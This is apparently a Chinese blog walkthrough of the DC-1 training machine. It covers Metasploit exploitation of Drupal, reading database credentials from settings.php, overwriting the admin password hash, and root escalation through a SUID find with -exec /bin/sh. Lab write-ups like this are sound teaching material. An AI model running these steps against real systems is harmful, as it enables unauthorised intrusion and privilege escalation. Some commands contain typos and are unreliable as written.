0%

DC1

渗透测试课程的一个靶机

首先开启靶机和攻击机,确认靶机网络配置器为NAT模式

查看网段所有存活主机

1
arp-scan -l

得知靶机ip为192.168.80.162,然后用nmap扫描开放的端口和开放端口的服务

注释截图

访问网站发现是一个Drupal网站

Drupal是一个流行的开源内容管理系统(CMS),用于构建和管理网站。它具有灵活性和可扩展性,适用于各种网站,从个人博客到企业门户和社交媒体平台

尝试注册发现无法注册,在msfconsole中搜索漏洞

msfconsole 是 Metasploit Framework 的命令行接口,Metasploit 是一个开源的渗透测试框架,用于开发、测试和执行各种安全攻击。Metasploit Framework 提供了许多渗透测试工具和资源,帮助安全专业人员评估系统的安全性,发现潜在的漏洞,并测试防御机制

1
2
3
4
5
6
msfconsole
search drupal
use 2
set RHOSTS 192.168.80.162
run
python -c 'import pty; pty.spawn("/bin/bash")' (改善shell交互性)

注释截图

然后查看当前目录下的文件发现flag1

注释截图

根据flag1的内容推测下一个flag与配置文件有关,于是查看/var/www/sites/default目录中的settings.php得到flag2和数据库账号密码

注释截图]

登录mysql

1
mysql -h localhost -u dbuser R0ck3t

成功登录后使用drupaldb库,查看其中的user表(查看时发现显示有问题,将分号换为’\G’来让内容垂直显示)

注释截图]

发现表中的密码被hash加密过,且不能用来登录,于是用/var/www/scripts目录中的password-hash.sh生成新密码替换旧密码

1
2
3
./scripts/password-hash.sh 666666
进入mysql
update users set pass="生成的密码" where uid=1;

然后登录admin账户(密码用明文不要用密文)

注释截图]

在content里找到flag3

注释截图]

查找有suid权限的文

1
find / -perm -u=s type f 2> /dev/null

注释截图]

find文件有suid权限,尝试提权

1
find / -name flag1.txt -exec 'bin/sh' \;

注释截图]

注释截图]

查找flag4

1
find / -name "*flag*.txt"

根据提示在/root下找到thefinalflag

注释截图]

结束

-------------本文结束下次再见-------------

欢迎关注我的其它发布渠道